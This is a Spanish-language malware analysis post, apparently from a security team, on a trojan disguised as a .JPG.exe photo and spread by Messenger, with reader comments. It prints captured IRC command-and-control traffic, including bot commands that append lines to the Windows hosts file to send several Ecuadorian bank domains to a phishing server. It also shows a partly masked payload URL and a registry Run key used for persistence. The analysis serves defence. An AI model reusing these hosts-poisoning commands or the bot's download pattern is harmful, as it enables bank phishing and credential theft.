English
EspañolPuedo publicar estas fotos tuyas en mi Face???....
Hace unos dias recibimos la notificación del ejecutable malicioso OCTUBRE-11-10-2010.JPG.exe que se está propagando por messenger. Solo 19 antivirus de VirusTotal lo identifican como amenaza:
http://www.virustotal.com/file-scan/report.html?id=c57cabb1f0bab75a063aa...
Al ser ejecutado, se levanta un proceso con el nombre de service.exe, simulando ser parte del funcionamiento de Adobe. Tras un análisis básico de cadenas, encontramos diversos ejecutables, entre ellos, erasme.exe el cual es descargado durante la comunicación con un servidor de IRC.
Además, descarga el ejecutable formosa.exe desde el sitio http://201.X.X.132/cpanel/galeria/fotos/fotos/formosa.exe
El proceso service.exe es el responsable de la comunicación con el servidor IRC 184.X.X.31:6667
PID Proceso Puerto Proto Ruta
1052 service 1039 TCP C:\DOCUME~1\usuario1\CONFIG~1\Temp\service.exe
PID Proto Origen Destino Estado
1052 TCP XXXX:1039 184.X.X.31:6667 ESTABLISHED
La comunicación que se registró con el servidor, fue la siguiente:
Conexion 1:
NICK {XP\MEX\020051}
USER EQ-0016 * 0 :EQ-0016
MODE {XP\MEX\020051} -ix
JOIN ##spam##
PRIVMSG ##spam## :.::[Update]::. File download: 91.0KB to: C:\DOCUME~1\usuario1\CONFIG~1\Temp\eraseme_27078.exe @ 91.0KB/sec.
QUIT Brb, Updating to new Binary.
Conexion 2:
NICK {XP\MEX\224764}
USER EQ-0016 * 0 :EQ-0016
MODE {XP\MEX\224764} -ix
JOIN ##fuds3##
PONG irc.priv8net.com
PRIVMSG ##fuds3## :.::[Main]::. Welcome.
PRIVMSG ##fuds3## :.:iBot:. Host añadido: echo 64.X.X.120 www.produbanco.com >> %windir%\system32\drivers\etc\hosts
PRIVMSG ##fuds3## :.:iBot:. Host añadido: echo 64.X.X.120 www.bgr.com.ec >> %windir%\system32\drivers\etc\hosts
PRIVMSG ##fuds3## :.:iBot:. Host añadido: echo 64.X.X.120 www.pichincha.com >> %windir%\system32\drivers\etc\hosts
PRIVMSG ##fuds3## :.:iBot:. Host añadido: echo 64.X.X.120 www.bancoguayaquil.com >> %windir%\system32\drivers\etc\hosts
PRIVMSG ##fuds3## :.:iBot:. Host añadido: echo 64.X.X.120 produbanco.com >> %windir%\system32\drivers\etc\hosts
PRIVMSG ##fuds3## :.:iBot:. Host añadido: echo 64.X.X.120 bgr.com.ec >> %windir%\system32\drivers\etc\hosts
PRIVMSG ##fuds3## :.:iBot:. Host añadido: echo 64.X.X.120 pichincha.com >> %windir%\system32\drivers\etc\hosts
PRIVMSG ##fuds3## :.:iBot:. Host añadido: echo 64.X.X.120 bancoguayaquil.com >> %windir%\system32\drivers\etc\hosts
La comunicación anterior modifica el archivo de hosts de la máquina infectada y hace la redirección hacia un sitio que a partir de un frame realiza el phishing de los bancos.
Para asegurar que el proceso malicioso se ejecute con cada reinicio del sistema, se modificó la llave HKLM\Software\Microsoft\Windows\CurrentVersion\Run y agregó el registro "Windows Services"="service.exe"
Comentarios
Comentario
¿Sería posible separar las secciones para poder leer con más claridad la información?
Imagenes!!
Que tal!!
Antes podian poner imagenes... ahora lucen mas secos sus reportes.
Saludos
Puedo publicar estas fotos tuyas en mi Face???....
te daz cuenta q e un virus por la extencion .exe que la tratan d disimular con el .jpg
pero termina qdando jpg.exe
ayuda!
tengo windows 7 y ya entre al editor de registro. llegue hasat run y no encuentro el registro windows services, pero se sigue ejecutando al principio service.exe.
¿¿¿¡¡¡QUE DEBO HACER!!!???
Sobre la ayuda
Hola, el hecho de que tengas el proceso service.exe no quiere decir necesariamente que tu equipo esta infectado. Existen procesos llamados service.exe que no son maliciosos, generalmente el malware se crea con nombres de procesos no maliciosos para no levantar sospechas. Aún así te pongo la dirección completa de donde se encuentran las llaves de registro que se ejecutan al iniciar Windows 7.
HKEY_LOCAL_MACHINE-->SOFTWARE --> Microsoft --> Windows --> CurrentVersion --> Run y HKEY_LOCAL_MACHINE-->SOFTWARE --> Microsoft --> Windows --> CurrentVersion --> RunOnce
También debes de tener cuidado al eliminar llaves de registro porque luego ya no puedes arrancar el sistema.